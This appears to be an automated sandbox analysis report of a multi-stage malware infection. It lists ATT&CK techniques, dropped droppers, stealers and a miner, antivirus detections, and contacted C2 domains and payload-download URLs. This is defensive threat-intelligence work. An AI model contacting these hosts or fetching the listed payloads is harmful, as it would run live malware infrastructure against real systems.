                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000A1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,44_2_000A1C61

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		2
                          Valid Accounts                          		21
                          Windows Management Instrumentation                          		1
                          Scripting                          		1
                          Exploitation for Privilege Escalation                          		11
                          Disable or Modify Tools                          		2
                          OS Credential Dumping                          		2
                          System Time Discovery                          		Remote Services11
                          Archive Collected Data                          		12
                          Ingress Tool Transfer                          		Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts11
                          Native API                          		1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		11
                          Deobfuscate/Decode Files or Information                          		21
                          Input Capture                          		1
                          Account Discovery                          		Remote Desktop Protocol41
                          Data from Local System                          		11
                          Encrypted Channel                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter                          		2
                          Valid Accounts                          		2
                          Valid Accounts                          		31
                          Obfuscated Files or Information                          		Security Account Manager14
                          File and Directory Discovery                          		SMB/Windows Admin Shares21
                          Input Capture                          		3
                          Non-Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts11
                          Scheduled Task/Job                          		11
                          Scheduled Task/Job                          		21
                          Access Token Manipulation                          		131
                          Software Packing                          		NTDS249
                          System Information Discovery                          		Distributed Component Object Model3
                          Clipboard Data                          		124
                          Application Layer Protocol                          		Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts2
                          PowerShell                          		11
                          Registry Run Keys / Startup Folder                          		312
                          Process Injection                          		1
                          DLL Side-Loading                          		LSA Secrets1091
                          Security Software Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                          Scheduled Task/Job                          		111
                          Masquerading                          		Cached Domain Credentials461
                          Virtualization/Sandbox Evasion                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                          Registry Run Keys / Startup Folder                          		2
                          Valid Accounts                          		DCSync14
                          Process Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job461
                          Virtualization/Sandbox Evasion                          		Proc Filesystem11
                          Application Window Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                          Access Token Manipulation                          		/etc/passwd and /etc/shadow1
                          System Owner/User Discovery                          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
                          Process Injection                          		Network Sniffing11
                          Remote System Discovery                          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                          System Network Configuration Discovery                          		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579182 Sample: file.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 149 treehoneyi.click 2->149 151 sweepyribs.lat 2->151 153 19 other IPs or domains 2->153 177 Suricata IDS alerts for network traffic 2->177 179 Found malware configuration 2->179 181 Malicious sample detected (through community Yara rule) 2->181 183 19 other signatures 2->183 11 skotes.exe 4 67 2->11         started        16 file.exe 5 2->16         started        18 Intel_PTT_EK_Recertification.exe 2->18         started        20 Intel_PTT_EK_Recertification.exe 2->20         started        signatures3 process4 dnsIp5 161 185.215.113.43, 49814, 49823, 49852 WHOLESALECONNECTIONSNL Portugal 11->161 163 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 11->163 165 31.41.244.11, 49828, 49858, 49873 AEROEXPRESS-ASRU Russian Federation 11->165 117 C:\Users\user\AppData\...\adcf1df75f.exe, PE32 11->117 dropped 119 C:\Users\user\AppData\...\3f5e6ed253.exe, PE32 11->119 dropped 121 C:\Users\user\AppData\...\ea2827841c.exe, PE32 11->121 dropped 127 11 other malicious files 11->127 dropped 225 Creates multiple autostart registry keys 11->225 227 Hides threads from debuggers 11->227 247 2 other signatures 11->247 22 f0aeaa9386.exe 8 11->22         started        26 3dd71a48b2.exe 11->26         started        28 ea2827841c.exe 11->28         started        41 3 other processes 11->41 123 C:\Users\user\AppData\Local\...\skotes.exe, PE32 16->123 dropped 125 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 16->125 dropped 229 Detected unpacking (changes PE section rights) 16->229 231 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->231 233 Tries to evade debugger and weak emulator (self modifying code) 16->233 235 Tries to detect virtualization through RDTSC time measurements 16->235 31 skotes.exe 16->31         started        237 Antivirus detection for dropped file 18->237 239 Multi AV Scanner detection for dropped file 18->239 241 Suspicious powershell command line found 18->241 249 2 other signatures 18->249 33 powershell.exe 18->33         started        35 explorer.exe 18->35         started        243 Injects code into the Windows Explorer (explorer.exe) 20->243 245 Modifies the context of a thread in another process (thread injection) 20->245 37 powershell.exe 20->37         started        39 explorer.exe 20->39         started        file6 signatures7 process8 dnsIp9 99 C:\Users\user\AppData\Local\Temp\...\file.bin, Zip 22->99 dropped 101 C:\Users\user\AppData\Local\Temp\...\7z.exe, PE32+ 22->101 dropped 103 C:\Users\user\AppData\Local\Temp\...\7z.dll, PE32+ 22->103 dropped 185 Multi AV Scanner detection for dropped file 22->185 187 Writes many files with high entropy 22->187 43 cmd.exe 2 22->43         started        105 C:\Users\user\AppData\Local\Temp\Wanting, data 26->105 dropped 107 C:\Users\user\AppData\Local\Temp\Sheets, data 26->107 dropped 109 C:\Users\user\AppData\Local\Temp\Judy, data 26->109 dropped 111 C:\Users\user\AppData\Local\Temp\Another, data 26->111 dropped 47 cmd.exe 26->47         started        167 home.fivetk5ht.top 185.121.15.192 REDSERVICIOES Spain 28->167 169 fivetk5ht.top 28->169 171 httpbin.org 98.85.100.80 TWC-11351-NORTHEASTUS United States 28->171 189 Antivirus detection for dropped file 28->189 191 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->191 193 Machine Learning detection for dropped file 28->193 209 3 other signatures 28->209 195 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 31->195 197 Tries to evade debugger and weak emulator (self modifying code) 31->197 199 Hides threads from debuggers 31->199 49 PING.EXE 33->49         started        52 conhost.exe 33->52         started        54 conhost.exe 37->54         started        173 treehoneyi.click 172.67.180.113 CLOUDFLARENETUS United States 41->173 175 discokeyus.lat 172.67.197.170, 443, 49890, 49897 CLOUDFLARENETUS United States 41->175 201 Detected unpacking (changes PE section rights) 41->201 203 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 41->203 205 Injects a PE file into a foreign processes 41->205 207 LummaC encrypted strings found 41->207 56 4fa7efe79d.exe 41->56         started        58 conhost.exe 41->58         started        file10 signatures11 process12 dnsIp13 113 C:\Users\user\AppData\...\file.zip (copy), Zip 43->113 dropped 211 Uses cmd line tools excessively to alter registry or file data 43->211 213 Writes many files with high entropy 43->213 60 in.exe 43->60         started        64 7z.exe 2 43->64         started        66 7z.exe 3 43->66         started        75 9 other processes 43->75 115 C:\Users\user\AppData\Local\Temp\...\Dry.com, PE32 47->115 dropped 215 Drops PE files with a suspicious file extension 47->215 68 Dry.com 47->68         started        71 cmd.exe 47->71         started        73 conhost.exe 47->73         started        77 7 other processes 47->77 145 127.1.10.1 unknown unknown 49->145 147 pancakedipyps.click 104.21.23.76, 443, 49911, 49917 CLOUDFLARENETUS United States 56->147 217 Query firmware table information (likely to detect VMs) 56->217 219 Found many strings related to Crypto-Wallets (likely being stolen) 56->219 221 Tries to harvest and steal ftp login credentials 56->221 223 2 other signatures 56->223 file14 signatures15 process16 dnsIp17 129 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 60->129 dropped 251 Suspicious powershell command line found 60->251 253 Uses cmd line tools excessively to alter registry or file data 60->253 255 Uses schtasks.exe or at.exe to add and modify task schedules 60->255 79 powershell.exe 60->79         started        82 attrib.exe 60->82         started        84 attrib.exe 60->84         started        86 schtasks.exe 60->86         started        131 C:\Users\user\AppData\Local\...\file_7.zip, Zip 64->131 dropped 257 Writes many files with high entropy 64->257 133 C:\Users\user\AppData\Local\...\file_6.zip, Zip 66->133 dropped 155 frostman.shop 116.203.12.114 HETZNER-ASDE Germany 68->155 157 t.me 149.154.167.99 TELEGRAMRU United Kingdom 68->157 259 Found many strings related to Crypto-Wallets (likely being stolen) 68->259 261 Found API chain indicative of sandbox detection 68->261 263 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 68->263 265 3 other signatures 68->265 135 C:\Users\user\AppData\Local\Temp\245347\b, data 71->135 dropped 137 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 75->137 dropped 139 C:\Users\user\AppData\Local\...\file_5.zip, Zip 75->139 dropped 141 C:\Users\user\AppData\Local\...\file_4.zip, Zip 75->141 dropped 143 3 other malicious files 75->143 dropped file18 signatures19 process20 signatures21 267 Uses ping.exe to check the status of other devices and networks 79->267 88 PING.EXE 79->88         started        91 conhost.exe 79->91         started        93 conhost.exe 82->93         started        95 conhost.exe 84->95         started        97 conhost.exe 86->97         started        process22 dnsIp23 159 127.0.0.1 unknown unknown 88->159

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          file.exe53%ReversingLabsWin32.Infostealer.Tinba
                          file.exe58%VirustotalBrowse
                          file.exe100%AviraTR/Crypt.TPM.Gen
                          file.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%AviraHEUR/AGEN.1352802
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%AviraHEUR/AGEN.1352802
                          C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe100%AviraTR/Crypt.TPM.Gen
                          C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe100%AviraTR/Crypt.XPACK.Gen
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe58%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe8%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe28%ReversingLabs
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe68%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe87%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[2].exe39%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exe87%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exe8%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exe58%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exe68%ReversingLabsWin32.Trojan.LummaStealer
                          C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exe39%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\1018972001\3f5e6ed253.exe28%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\1018973001\adcf1df75f.exe67%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                          C:\Users\user\AppData\Local\Temp\245347\Dry.com0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Infostealer.Tinba
                          C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\main\extracted\in.exe70%ReversingLabsWin64.Trojan.Nekark
                          C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe70%ReversingLabsWin64.Trojan.Nekark

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          SourceDetectionScannerLabelLink
                          discokeyus.lat0%URL Reputationsafe
                          grannyejh.lat0%URL Reputationsafe

                          URLs

                          No Antivirus matches

                          Domains and IPs

                          Contacted Domains

                          NameIPActiveMaliciousAntivirus DetectionReputation
                          pancakedipyps.click
                          		104.21.23.76
                          		truetrue
                            chrome.cloudflare-dns.com
                            		172.64.41.3
                            		truefalse
                              treehoneyi.click
                              		172.67.180.113
                              		truetrue
                                plus.l.google.com
                                		142.250.181.46
                                		truefalse
                                  t.me
                                  		149.154.167.99
                                  		truefalse
                                    frostman.shop
                                    		116.203.12.114
                                    		truetrue
                                      ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                      		94.245.104.56
                                      		truefalse
                                        fivetk5ht.top
                                        		185.121.15.192
                                        		truetrue
                                          home.fivetk5ht.top
                                          		185.121.15.192
                                          		truetrue
                                            discokeyus.lat
                                            		172.67.197.170
                                            		truetrue
                                            • 0%, URL Reputation
                                            www.google.com
                                            		172.217.19.228
                                            		truefalse
                                              googlehosted.l.googleusercontent.com
                                              		172.217.17.65
                                              		truefalse
                                                httpbin.org
                                                		98.85.100.80
                                                		truefalse
                                                  assets.msn.cn
                                                  		unknown
                                                  		unknownfalse
                                                    sweepyribs.lat
                                                    		unknown
                                                    		unknowntrue
                                                      ntp.msn.com
                                                      		unknown
                                                      		unknownfalse
                                                        staticview.msn.com
                                                        		unknown
                                                        		unknownfalse
                                                          clients2.googleusercontent.com
                                                          		unknown
                                                          		unknownfalse
                                                            bzib.nelreports.net
                                                            		unknown
                                                            		unknownfalse
                                                              bGZEIFIQcYIvivmO.bGZEIFIQcYIvivmO
                                                              		unknown
                                                              		unknownfalse
                                                                grannyejh.lat
                                                                		unknown
                                                                		unknowntrue
                                                                • 0%, URL Reputation
                                                                apis.google.com
                                                                		unknown
                                                                		unknownfalse

                                                                  Contacted URLs

                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  https://steamcommunity.com/profiles/76561199809363512true
                                                                    http://fivetk5ht.top/v1/upload.phptrue
                                                                      aspecteirs.lattrue
                                                                        https://t.me/k04aelfalse
                                                                          http://185.215.113.43/Zu7JuNko/index.phptrue
                                                                            sustainskelet.lattrue
                                                                              rapeflowwj.lattrue
                                                                                https://pancakedipyps.click/apitrue
                                                                                  http://31.41.244.11/files/karl/random.exefalse
                                                                                    energyaffai.lattrue
                                                                                      https://treehoneyi.click/apitrue
                                                                                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851true
                                                                                          https://frostman.shop/true
                                                                                            grannyejh.lattrue
                                                                                              pancakedipyps.clicktrue
                                                                                                necklacebudi.lattrue
                                                                                                  https://discokeyus.lat/apitrue
                                                                                                    crosshuaht.lattrue
                                                                                                      https://httpbin.org/ipfalse
                                                                                                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=McrSMDEQlisW3cFq1734740102true
                                                                                                          discokeyus.lattrue

                                                                                                            URLs from Memory and Binaries

                                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                                            https://duckduckgo.com/chrome_newtabDry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://duckduckgo.com/ac/?q=Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                  http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://pancakedipyps.click/api744fa7efe79d.exe, 00000031.00000003.3341633899.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000002.3353786909.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3269260306.00000000010E1000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3255523505.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3317884862.00000000010E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl03dd71a48b2.exe.5.drfalse
                                                                                                                          http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0_3dd71a48b2.exe.5.drfalse
                                                                                                                            https://www.autoitscript.com/autoit3/Saved.28.drfalse
                                                                                                                              https://sweepyribs.lat/apidb77c3e215.exe, 0000002E.00000003.3039864734.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000002.3041593577.0000000000A87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                https://pancakedipyps.click/4fa7efe79d.exe, 00000031.00000003.3317884862.00000000010E8000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3165945522.0000000003827000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3255593966.00000000010F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  https://curl.se/docs/hsts.htmlea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    https://pancakedipyps.click/$4fa7efe79d.exe, 00000031.00000002.3354005285.00000000010F4000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3347644915.00000000010F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      https://frostman.shop243684eab2gleDry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        https://frostman.shopaDry.com, 0000002C.00000002.3802571549.00000000006AD000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.000000000077C000.00000040.00001000.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3802571549.00000000005D1000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          https://api.libertyreserve.com/beta/xml/transfer.aspxskotes.exe, 00000005.00000003.3334552390.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            https://discokeyus.lat/vdb77c3e215.exe, 0000002E.00000002.3041593577.0000000000A73000.00000004.00000020.00020000.00000000.sdmp, db77c3e215.exe, 0000002E.00000003.3039864734.0000000000A73000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#skotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                https://discokeyus.lat/y;db77c3e215.exe, 0000002E.00000002.3041344893.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000002.3813400945.0000000004434000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl04fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      https://t.me/k04aelm0nk3Mozilla/5.0Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17ea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          http://www.autoitscript.com/autoit3/XDry.com, 0000002C.00000002.3802321796.00000000000F5000.00000002.00000001.01000000.00000010.sdmp, Volunteer.28.drfalse
                                                                                                                                                            http://ocsp.rootca1.amazontrust.com0:4fa7efe79d.exe, 00000031.00000003.3191559717.0000000003859000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              http://nsis.sf.net/NSIS_ErrorError3dd71a48b2.exe, 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmp, 3dd71a48b2.exe, 0000001C.00000000.2901359460.0000000000409000.00000002.00000001.01000000.0000000D.sdmp, 3dd71a48b2.exe.5.drfalse
                                                                                                                                                                https://curl.se/docs/alt-svc.htmlea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://xmrig.com/wizardIntel_PTT_EK_Recertification.exe, 0000001D.00000003.2931352333.0000020164CF0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2950378523.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Intel_PTT_EK_Recertification.exe, 00000034.00000003.3278299159.000001A628D70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000035.00000002.3284448513.00000001402DD000.00000002.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://www.ecosia.org/newtab/Dry.com, 0000002C.00000002.3807607263.00000000019A0000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139864255.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139696616.00000000037E7000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3139551136.00000000037EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br4fa7efe79d.exe, 00000031.00000003.3192780675.00000000038D5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        https://treehoneyi.click/3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmp, 3f5e6ed253.exe, 00000033.00000002.3371941837.0000000001529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          https://treehoneyi.click/B3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://httpbin.org/ipbeforeea2827841c.exe, 00000032.00000003.3194981090.0000000007266000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://crl.microdb77c3e215.exe, 0000002E.00000003.3039830752.0000000000ADD000.00000004.00000020.00020000.00000000.sdmp, 3f5e6ed253.exe, 00000033.00000002.3375144343.0000000003DB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                https://frostman.shop7QQ9ZMngDry.com, 0000002C.00000002.3802571549.00000000005F9000.00000040.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zskotes.exe, 00000005.00000003.3334139164.0000000000A6C000.00000004.00000020.00020000.00000000.sdmp, 4fa7efe79d.exe, 0000002F.00000002.3092900410.0000000001177000.00000004.00000020.00020000.00000000.sdmp, random[1].exe1.5.drfalse
                                                                                                                                                                                    https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0Dry.com, 0000002C.00000003.3134030168.0000000004489000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refDry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmp, 4fa7efe79d.exe, 00000031.00000003.3193522124.0000000003838000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477Dry.com, 0000002C.00000002.3812650732.0000000004321000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://t.me/k04Dry.com, 0000002C.00000003.3133365512.000000000194F000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133312645.00000000019EC000.00000004.00000020.00020000.00000000.sdmp, Dry.com, 0000002C.00000003.3133856971.00000000019EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            https://sci.libertyreserve.com/skotes.exe, 00000005.00000003.3334552390.0000000000A84000.00000004.00000020.00020000.00000000.sdmpfalse
